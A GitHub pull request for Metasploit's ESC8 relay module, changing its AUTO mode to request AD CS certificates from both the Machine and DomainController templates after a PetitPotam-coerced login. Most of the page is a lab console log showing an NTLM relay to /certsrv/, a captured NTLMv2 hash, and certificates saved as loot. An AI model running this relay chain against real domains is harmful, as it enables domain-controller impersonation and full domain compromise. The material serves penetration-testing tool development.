Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Change behavior of esc8 'AUTO' mode to attempt to get a cert based on DC and Machine types #19856

Open
wants to merge 2 commits into
base: master
Choose a base branch
from
Open

Change behavior of esc8 'AUTO' mode to attempt to get a cert based on DC and Machine types #19856

wants to merge 2 commits into from
+9 −6

Conversation

bwatters-r7
Copy link
Contributor

@bwatters-r7 bwatters-r7 commented Feb 3, 2025
edited
Loading

This PR fixes one thing and adds support for another in the ESC8 module's AUTO mode. Previously, AUTO mode requested a certificate based on the Computer template if the authenticating entity was a computer (name ended in $).

This changes 2 things:

  1. As it turns out, if you'd like to generate a certificate based on the Computer template, you need to request it for the Machine Template because the certificate has both a template name and a display name. Requesting the template by the DisplayName Computer fails; requesting the template name Machine succeeds.

  2. In addition to fixing that, we added an attempt to get a cert based on the DomainController certificate template. Now, when on AUTO if a computer login is detected we try to mint a cert based on both the Machine and DomainController templates so that if someone coerces a login from a DC using Petit Potam, we can get the DC cert.

To do:

  • Determine what permission allows us to issue a cert based on the DomainController and Machine certificate types. To get it to work, I added all the permissions I could find, so I need to narrow that one down a bit....

@bwatters-r7
Copy link
Contributor Author 

msf6 auxiliary(server/relay/esc8) > run
[*] Auxiliary module running as background job 0.
msf6 auxiliary(server/relay/esc8) > 
[*] Checking endpoint on http://10.5.132.180:80/certsrv/
[*] SMB Server is running. Listening on 0.0.0.0:445
[*] Server started.
[*] New request from 10.5.132.130
I, [2025-02-03T17:04:01.974044 #13337]  INFO -- : Starting thread for connection from 10.5.132.130
I, [2025-02-03T17:04:01.994004 #13337]  INFO -- : Negotiated dialect: SMB v2.0.2
D, [2025-02-03T17:04:02.002286 #13337] DEBUG -- : Dispatching request to do_session_setup_smb2 (session: nil)
D, [2025-02-03T17:04:02.022911 #13337] DEBUG -- : Dispatching request to do_session_setup_smb2 (session: #<Session id: 4294686564, user_id: nil, state: :in_progress>)
I, [2025-02-03T17:04:02.024305 #13337]  INFO -- : NTLM authentication request overridden to succeed for EXAMPLE\WIN2019__4CB9$
D, [2025-02-03T17:04:02.029630 #13337] DEBUG -- : Dispatching request to do_tree_connect_smb2 (session: #<Session id: 4294686564, user_id: "EXAMPLE\\WIN2019__4CB9$", state: :valid>)
[*] Received request for EXAMPLE\WIN2019__4CB9$
[*] Relaying to next target http://10.5.132.180:80/certsrv/
D, [2025-02-03T17:04:02.036505 #13337] DEBUG -- : Dispatching request to do_session_setup_smb2 (session: #<Session id: 4294686564, user_id: "EXAMPLE\\WIN2019__4CB9$", state: :in_progress>)
I, [2025-02-03T17:04:02.037214 #13337]  INFO -- : Relaying NTLM type 1 message to 10.5.132.180 (Always Sign: true, Sign: true, Seal: false)
D, [2025-02-03T17:04:02.046613 #13337] DEBUG -- : Dispatching request to do_session_setup_smb2 (session: #<Session id: 4294686564, user_id: "EXAMPLE\\WIN2019__4CB9$", state: :in_progress>)
I, [2025-02-03T17:04:02.047993 #13337]  INFO -- : Relaying NTLMv2 type 3 message to http://10.5.132.180:80/certsrv/ as EXAMPLE\WIN2019__4CB9$
[+] Identity: EXAMPLE\WIN2019__4CB9$ - Successfully authenticated against relay target http://10.5.132.180:80/certsrv/
[SMB] NTLMv2-SSP Client     : 10.5.132.180
[SMB] NTLMv2-SSP Username   : EXAMPLE\WIN2019__4CB9$
[SMB] NTLMv2-SSP Hash       : WIN2019__4CB9$::EXAMPLE:232179cd29005071:afc537ffeecf203a35f2c297cdec93e2:0101000000000000076a73e88f76db0181fac43d4b8b30b80000000002000e004500580041004d0050004c00450001001e00570049004e002d00440052004300390048004300440049004d0041005400040016006500780061006d0070006c0065002e0063006f006d0003003600570049004e002d00440052004300390048004300440049004d00410054002e006500780061006d0070006c0065002e0063006f006d00050016006500780061006d0070006c0065002e0063006f006d0007000800076a73e88f76db010600040002000000080030003000000000000000000000000040000004d7cf62582b5e914543c910a2e5fb65d9628e3c520e945ff8402d6335e9363b0a001000000000000000000000000000000000000900220063006900660073002f00310030002e0035002e003100330035002e00320030003100000000000000000000000000

[*] Mode: AUTO
[*] AUTO Mode
[*] Creating certificate request for EXAMPLE\WIN2019__4CB9$ using the DomainController template
[*] Generating CSR...
[*] CSR Generated
[*] Requesting relay target generate certificate...
[+] Certificate generated using template DomainController and EXAMPLE\WIN2019__4CB9$
[*] Attempting to download the certificate from /certsrv/certnew.cer?ReqID=117&
[+] Certificate for EXAMPLE\WIN2019__4CB9$ using template DomainController saved to /home/tmoose/.msf4/loot/20250203170433_default_10.5.132.180_windows.ad.cs_564029.pfx
[*] Creating certificate request for EXAMPLE\WIN2019__4CB9$ using the Machine template
[*] Generating CSR...
[*] CSR Generated
[*] Requesting relay target generate certificate...
[+] Certificate generated using template Machine and EXAMPLE\WIN2019__4CB9$
[*] Attempting to download the certificate from /certsrv/certnew.cer?ReqID=118&
[+] Certificate for EXAMPLE\WIN2019__4CB9$ using template Machine saved to /home/tmoose/.msf4/loot/20250203170434_default_10.5.132.180_windows.ad.cs_666629.pfx
[*] Relay tasks complete; waiting for next login attempt.
D, [2025-02-03T17:04:34.353567 #13337] DEBUG -- : Dispatching request to do_tree_connect_smb2 (session: #<Session id: 4294686564, user_id: "EXAMPLE\\WIN2019__4CB9$", state: :valid>)
[*] Received request for EXAMPLE\WIN2019__4CB9$
[*] Identity: EXAMPLE\WIN2019__4CB9$ - All targets relayed to
D, [2025-02-03T17:04:34.357908 #13337] DEBUG -- : Received TREE_CONNECT request for share: IPC$
D, [2025-02-03T17:04:34.366532 #13337] DEBUG -- : Dispatching request to do_ioctl_smb2 (session: #<Session id: 4294686564, user_id: "EXAMPLE\\WIN2019__4CB9$", state: :valid>)
D, [2025-02-03T17:04:34.367210 #13337] DEBUG -- : Received IOCTL request for share: IPC$
D, [2025-02-03T17:04:34.372550 #13337] DEBUG -- : Dispatching request to do_logoff_smb2 (session: #<Session id: 4294686564, user_id: "EXAMPLE\\WIN2019__4CB9$", state: :valid>)
D, [2025-02-03T17:04:34.376207 #13337] DEBUG -- : Dispatching request to do_session_setup_smb2 (session: nil)
E, [2025-02-03T17:04:34.376762 #13337] ERROR -- : Failed to parse the ASN1-encoded authentication request (too long)
I, [2025-02-03T17:04:34.377231 #13337]  INFO -- : Ending thread for connection from 10.5.132.130

@bwatters-r7
Copy link
Contributor Author

To get this to work, I needed to give full control over the Domain Controllers Template to Domain controllers
image

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers
No reviews
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.
1 participant
@bwatters-r7